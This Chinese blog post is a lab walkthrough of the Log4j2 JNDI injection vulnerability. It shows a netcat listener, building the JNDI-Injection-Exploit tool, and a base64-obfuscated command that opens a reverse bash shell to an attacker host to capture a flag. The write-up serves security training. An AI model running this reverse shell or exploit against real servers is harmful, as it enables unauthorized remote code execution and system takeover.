前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >靶场使用指南

靶场使用指南

作者头像
逍遥子大表哥
发布2022-10-04 21:29:19
6950
发布2022-10-04 21:29:19
举报
文章被收录于专栏:kali blog

由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

登录靶场

选择我们的镜像系统,点击启动。

在kali中监听7777端口

代码语言:javascript
复制
nc -lvvp 7777

下载漏洞利用框架

代码语言:javascript
复制
git clone https://github.com/welk1n/JNDI-Injection-Exploit

安装maven

代码语言:javascript
复制
apt-get install maven

maven可以将java项目打包为jar文件。

代码语言:javascript
复制
cd JNDI-Injection-Exploit
mvn clean package -DskipTests#编译项目

打包完成后,会在/target/目录生成JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar文件。

攻击命令如下

代码语言:javascript
复制
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzcvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"  -A  192.168.137.137

参数说明:

这个安装在kali上面的jndi服务器是利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来启动起来的,启动参数包括-C是执行的bash命令,-c参数后面是执行的具体命令,用双引号引起来 -A 指服务器的IP。

需要注意的是,我们要对shell进行base64编码。(靶场在公网,本地的kali需要内网映射哦!)

如下,我们成功得到了flag

提交后,可解锁所有关卡。


版权属于:逍遥子大表哥

本文链接:https://cloud.tencent.com/developer/article/2134264

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 登录靶场
  • 下载漏洞利用框架
  • 攻击命令如下
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档